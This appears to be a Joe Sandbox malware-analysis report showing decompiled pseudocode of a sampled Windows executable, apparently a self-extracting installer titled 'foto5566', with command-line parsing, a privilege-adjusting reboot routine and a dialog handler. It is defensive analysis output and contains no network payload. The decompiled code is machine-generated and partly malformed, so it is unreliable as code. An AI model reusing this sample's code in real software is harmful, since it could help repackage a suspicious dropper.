Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: c7a9664288990d744b92c8943d4f9d0b12541f099b44e17d7ed128c103b6fb42
Instruction ID: 1156dce65f19a63eb756dcbf99b6fb4583df4e5cdf14ae2f5f8ab33e7b7ae441
Opcode Fuzzy Hash: c7a9664288990d744b92c8943d4f9d0b12541f099b44e17d7ed128c103b6fb42
Instruction Fuzzy Hash: DBB0123304424CBBCF001FC2EC09F893F1DE7C4761F150000F60D490508E72A5108696

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00ce4cc8
0x00ce4ccf

APIs

GlobalFree.KERNELBASE ref: 00CE4CC8

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 6f9a77bec6e84a25b81b7c3943e71ad0b29b5b82e50c81e10186c0008aad7bc6
Instruction ID: 856877a2c0172e58da4261a9bd8f676322ef955a1ade76d5d08e86a4d4cd9483
Opcode Fuzzy Hash: 6f9a77bec6e84a25b81b7c3943e71ad0b29b5b82e50c81e10186c0008aad7bc6
Instruction Fuzzy Hash: 4EB0123100014CBB8F001B42EC089493F1DD6C02707000010F50D450218F37A8118585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CE5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00CE5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xce8004; // 0xd1db73d
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00CE6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00CE6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xce8004; // 0xd1db73d
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00CE597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00CE44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xce9124 = E00CE6285();
									_t75 = 0;
								}
								return E00CE6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00CE44B9(0, 0x521, 0xce1140, 0, 0x40, 0);
												_t85 =  *0xce8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00CE667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00CE667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00CE5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00CE1680(0xce8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00CE667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00CE667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xce8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00CE5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xce8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xce8a3a;
																}
																E00CE1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00CE658A(_t218, 0x104, 0xce1140);
																if(E00CE31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xce8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xce8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xce8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xce8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xce8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xce9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xce9a2c =  *0xce9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xce8d48 =  *0xce8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xce9a2c =  *0xce9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xce9a2c =  *0xce9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xce8d48 =  *0xce8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xce9a2c =  *0xce9a2c | 0x00000004;
																										L70:
																										 *0xce8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xce9a2c = 3;
																	 *0xce8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xce8a2c != 0 &&  *0xce8b3e == 0) {
						if(GetModuleFileNameA( *0xce9a3c, 0xce8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00CE66C8(0xce8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00ce5c9e
0x00ce5ca9
0x00ce5cb0
0x00ce5cb3
0x00ce5cb6
0x00ce5cb7
0x00ce5cb8
0x00ce5cbd
0x00ce6204
0x00ce5ccb
0x00000000
0x00ce5ccb
0x00ce5cd3
0x00ce5cd7
0x00ce5cf4
0x00000000
0x00ce5cf4
0x00ce5cf8
0x00ce5d00
0x00000000
0x00ce5d06
0x00ce5d06
0x00ce5d0e
0x00ce5d10
0x00ce5d12
0x00ce5d14
0x00ce5d15
0x00ce5d17
0x00ce5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce5d19
0x00ce5d19
0x00ce5d1d
0x00000000
0x00ce5d3f
0x00ce5d3f
0x00ce5d4b
0x00ce5d4b
0x00ce5d4f
0x00ce5d8d
0x00000000
0x00ce5d93
0x00ce5d93
0x00ce5d9a
0x00ce5d9d
0x00ce5d9e
0x00000000
0x00ce5d9e
0x00ce5d51
0x00ce5d5b
0x00ce5d72
0x00ce60fb
0x00ce60fb
0x00ce6207
0x00ce620a
0x00ce620b
0x00ce620e
0x00ce6217
0x00ce5d78
0x00ce5d78
0x00ce5d80
0x00ce5d83
0x00ce5d84
0x00000000
0x00ce5d84
0x00ce5d5d
0x00ce5d5f
0x00ce5d62
0x00ce5d68
0x00ce5d64
0x00ce5d64
0x00ce5d64
0x00000000
0x00ce5d62
0x00ce5d5b
0x00ce5d4f
0x00ce5d1d
0x00000000
0x00ce5d9f
0x00ce5d9f
0x00ce5da5
0x00ce5dab
0x00ce5dba
0x00ce6218
0x00ce621d
0x00ce6220
0x00ce6221
0x00ce6229
0x00ce6230
0x00ce6247
0x00ce626a
0x00ce6272
0x00ce6249
0x00ce6255
0x00ce625f
0x00ce6264
0x00ce6264
0x00ce6284
0x00ce5dc0
0x00ce5dc0
0x00ce5dca
0x00ce5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce5dcc
0x00ce5dce
0x00ce5e24
0x00ce5e24
0x00ce5e2c
0x00ce5e47
0x00ce5e4a
0x00ce61d2
0x00ce61e2
0x00ce61e7
0x00ce61ee
0x00ce61f1
0x00ce61f1
0x00ce61f8
0x00ce61f8
0x00ce5e50
0x00ce5e53
0x00ce6109
0x00ce611f
0x00000000
0x00ce6125
0x00ce6137
0x00ce613a
0x00ce613c
0x00ce613e
0x00ce613e
0x00ce6141
0x00ce6141
0x00ce6143
0x00ce6144
0x00ce614a
0x00000000
0x00ce6150
0x00ce6152
0x00ce615c
0x00ce6170
0x00ce6172
0x00ce617c
0x00ce6190
0x00ce6190
0x00ce6196
0x00ce61a5
0x00000000
0x00ce61ab
0x00ce61b9
0x00ce61c6
0x00ce61c6
0x00ce617e
0x00ce6180
0x00ce618a
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce618a
0x00ce615e
0x00ce6160
0x00ce616a
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce616a
0x00ce615c
0x00ce614a
0x00ce610b
0x00ce610e
0x00ce610e
0x00000000
0x00ce5e59
0x00ce5e59
0x00ce5e5c
0x00ce604f
0x00ce6056
0x00000000
0x00ce605c
0x00ce606e
0x00ce6071
0x00ce6073
0x00ce6075
0x00ce6075
0x00ce6078
0x00ce6078
0x00ce607a
0x00ce607b
0x00ce6081
0x00000000
0x00ce6087
0x00ce6087
0x00ce608d
0x00ce609c
0x00000000
0x00ce60a2
0x00ce60aa
0x00ce60b2
0x00ce60b7
0x00ce60bd
0x00ce60bf
0x00ce60bf
0x00ce60d6
0x00ce60e0
0x00ce60e7
0x00ce60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce60f5
0x00ce609c
0x00ce6081
0x00ce5e62
0x00ce5e62
0x00ce5e65
0x00ce5fd3
0x00ce5fe9
0x00000000
0x00ce5fef
0x00ce5fef
0x00ce5ff7
0x00ce5ffd
0x00ce6003
0x00ce6006
0x00ce6011
0x00ce6014
0x00ce603d
0x00ce6016
0x00ce6018
0x00ce6019
0x00ce601b
0x00ce6033
0x00ce601d
0x00ce6020
0x00ce6029
0x00ce6022
0x00ce6022
0x00ce6022
0x00ce6020
0x00ce601b
0x00ce6042
0x00ce6044
0x00ce6046
0x00ce604a
0x00ce5ff7
0x00ce5fd5
0x00ce5fd8
0x00ce5fd8
0x00000000
0x00ce5e6b
0x00ce5e6b
0x00ce5e6e
0x00ce5f8b
0x00ce5f99
0x00000000
0x00ce5f9f
0x00ce5fa7
0x00ce5faf
0x00000000
0x00ce5fb1
0x00ce5fb3
0x00000000
0x00ce5fb5
0x00ce5fb7
0x00000000
0x00ce5fb9
0x00000000
0x00ce5fb9
0x00ce5fb7
0x00ce5fb3
0x00ce5faf
0x00ce5f8d
0x00ce5f8d
0x00ce5f8d
0x00ce5f8f
0x00ce5fc1
0x00ce5fc1
0x00ce5fc1
0x00000000
0x00ce5e74
0x00ce5e74
0x00ce5e77
0x00ce5ea0
0x00ce5ebd
0x00ce5f79
0x00000000
0x00ce5f7f
0x00ce5ec3
0x00ce5ec3
0x00ce5ecc
0x00ce5ed4
0x00ce5ed6
0x00ce5edc
0x00ce5edf
0x00ce5eea
0x00ce5eed
0x00ce5f3f
0x00ce5f40
0x00000000
0x00ce5eef
0x00ce5eef
0x00ce5ef2
0x00ce5f34
0x00ce5ef4
0x00ce5ef4
0x00ce5ef7
0x00ce5f2b
0x00000000
0x00ce5ef9
0x00ce5ef9
0x00ce5efc
0x00ce5f22
0x00000000
0x00ce5efe
0x00ce5eff
0x00ce5f02
0x00ce5f16
0x00ce5f04
0x00ce5f07
0x00ce5f0d
0x00ce5f46
0x00ce5f46
0x00ce5f09
0x00ce5f09
0x00ce5f09
0x00ce5f07
0x00ce5f02
0x00ce5efc
0x00ce5ef7
0x00ce5ef2
0x00ce5f4c
0x00ce5f4e
0x00ce5f50
0x00ce5f54
0x00ce5ed4
0x00ce5ea2
0x00ce5ea4
0x00ce5eaf
0x00ce5eaf
0x00000000
0x00ce5e79
0x00ce5e7d
0x00000000
0x00ce5e83
0x00ce5e83
0x00ce5e83
0x00ce5e85
0x00ce5e85
0x00ce5e8e
0x00000000
0x00ce5e94
0x00000000
0x00ce5e94
0x00ce5e8e
0x00ce5e7d
0x00ce5e77
0x00ce5e6e
0x00ce5e65
0x00ce5e5c
0x00000000
0x00000000
0x00000000
0x00ce5dd0
0x00ce5dd0
0x00ce5dd0
0x00000000
0x00ce5dd0
0x00ce5dce
0x00ce5dca
0x00ce5dba
0x00000000
0x00ce5d00
0x00ce5dd9
0x00ce5e04
0x00ce61fe
0x00ce5e0a
0x00ce5e0c
0x00ce5e17
0x00ce5e17
0x00ce5e04
0x00ce6200
0x00ce6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00CE5CEE
GetModuleFileNameA.KERNEL32(00CE8B3E,00000104,00000000,?,?), ref: 00CE5DFC
CharUpperA.USER32(?), ref: 00CE5E3E
CharUpperA.USER32(-00000052), ref: 00CE5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00CE5F6F
CharUpperA.USER32(?), ref: 00CE5FA7
CharUpperA.USER32(-0000004E), ref: 00CE6008
CharUpperA.USER32(?), ref: 00CE60AA
CloseHandle.KERNEL32(00000000,00CE1140,00000000,00000040,00000000), ref: 00CE61F1
ExitProcess.KERNEL32 ref: 00CE61F8

Strings

", xrefs: 00CE612D
:, xrefs: 00CE6118
RegServer, xrefs: 00CE5F66
", xrefs: 00CE5D78

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 7e122afbac6544b3b94586e1343454af05e7e8c58a4852876364b07a30648f41
Instruction ID: 81f3005b9232081bf831299093cf48191bd3b8f72c9d963fb0aa46e53cc11136
Opcode Fuzzy Hash: 7e122afbac6544b3b94586e1343454af05e7e8c58a4852876364b07a30648f41
Instruction Fuzzy Hash: 72D18E71A14AD45FDF35CB3B8C883BD7B61AB2534CF1801A9D4E6DB191DA788F868B04

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00CE1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xce9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xce8004; // 0xd1db73d
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00CE44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00CE6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00CE44B9(0, 0x522, 0xce1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00CE1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00ce1f90
0x00ce1f90
0x00ce1f93
0x00ce1f98
0x00ce1fa4
0x00ce1fa7
0x00ce1fc5
0x00ce1fcd
0x00ce1fdb
0x00ce1ee5
0x00ce1eea
0x00ce1ef1
0x00ce1ef4
0x00ce1f0c
0x00ce1f2e
0x00ce1f3a
0x00ce1f46
0x00ce1f4d
0x00ce1f58
0x00ce1f60
0x00ce1f61
0x00ce1f62
0x00ce1f75
0x00ce1f80
0x00ce1f77
0x00ce1f77
0x00000000
0x00ce1f77
0x00ce1f64
0x00ce1f64
0x00000000
0x00ce1f64
0x00ce1f0e
0x00ce1f0e
0x00ce1f13
0x00ce1f13
0x00ce1f14
0x00ce1f14
0x00ce1f16
0x00ce1f17
0x00ce1f1a
0x00ce1f1f
0x00ce1f1f
0x00ce1f86
0x00ce1f8f
0x00ce1fcf
0x00ce1fd3
0x00000000
0x00ce1fd3
0x00ce1fa9
0x00ce1fb4
0x00ce1fbb
0x00ce1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce1fc3
0x00ce1f9a
0x00ce1f9a
0x00ce1fa2
0x00ce1fd9
0x00ce1fda
0x00000000
0x00000000
0x00000000
0x00ce1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00CE1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00CE1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00CE1FD3

Strings

SeShutdownPrivilege, xrefs: 00CE1F28

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: e62671382e8c9c9da05d34480ebd592ee8dcd048bf9581aad07560fdef81e1dd
Instruction ID: 403beace9f23d3f6f0314e3295f682733471b616dda099da16eab5501b639a8c
Opcode Fuzzy Hash: e62671382e8c9c9da05d34480ebd592ee8dcd048bf9581aad07560fdef81e1dd
Instruction Fuzzy Hash: 4921F971B402C5ABDB205BE39C8AFBF77B8EB85B11F240018FE02E6181D774991192A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00ce6cf7
0x00ce6d00
0x00ce6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00CE6E26,00CE1000), ref: 00CE6CF7
UnhandledExceptionFilter.KERNEL32(00CE6E26,?,00CE6E26,00CE1000), ref: 00CE6D00
GetCurrentProcess.KERNEL32(C0000409,?,00CE6E26,00CE1000), ref: 00CE6D0B
TerminateProcess.KERNEL32(00000000,?,00CE6E26,00CE1000), ref: 00CE6D12

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 8aaab811a2d55dc0746b3c8aa396b01fd948e2fa92cfbc48559569b0b86c895c
Instruction ID: aa2a813265b1624860709b7c350e09e305217589c4c70dd9513eda6ad50578e5
Opcode Fuzzy Hash: 8aaab811a2d55dc0746b3c8aa396b01fd948e2fa92cfbc48559569b0b86c895c
Instruction Fuzzy Hash: E7D0C932000288FFDB002BE1EC4CB5D3F28EB49212F455004F3198A020CA3264518B56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00CE3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00CE43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "foto5566");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xce9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xce91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00CE44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xce91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xce91e5 - 3;
						if(_t49 - 0xce91e5 < 3) {
							goto L32;
						}
